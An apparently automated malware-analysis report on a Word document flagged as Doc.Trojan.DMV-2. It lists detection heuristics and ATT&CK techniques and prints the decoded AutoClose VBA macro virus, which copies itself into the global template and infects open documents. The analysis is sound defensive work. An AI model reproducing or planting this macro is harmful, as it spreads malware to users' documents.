MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a VBA macro. The AutoClose macro is designed to copy itself to the global template and potentially execute further malicious actions. The presence of the AutoClose macro and the VBA macros strongly suggests a malicious document intended for distribution via spearphishing.
Heuristics 4
-
ClamAV: Doc.Trojan.DMV-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.DMV-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1058 bytes |
SHA-256: df649e2c1d3b44c03dd4e26d24db769ea925066d860d76c50bf4ad74578d721a |
|||
|
Detection
ClamAV:
Doc.Trojan.DMV-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Dim title$
Dim total
Dim present
Dim cycle
Dim a$
title$ = "MWSC Class Of '96"
total = WordBasic.CountMacros(0)
present = 0
If total > 0 Then
For cycle = 1 To total
If WordBasic.[MacroName$](cycle, 0) = "AutoClose" Then
present = 1
End If
'End If
a$ = WordBasic.[WindowName$]() + ":AutoClose"
If present <> 1 Then
WordBasic.MacroCopy a$, "Global:AutoClose"
Else
present = 0
If WordBasic.CountMacros(1) <> 0 Then
present = 1
End If
If present = 0 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", a$
End If
End If
WordBasic.FileSave
Next
End If
End Sub
Attribute VB_Name = "NewMacros"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.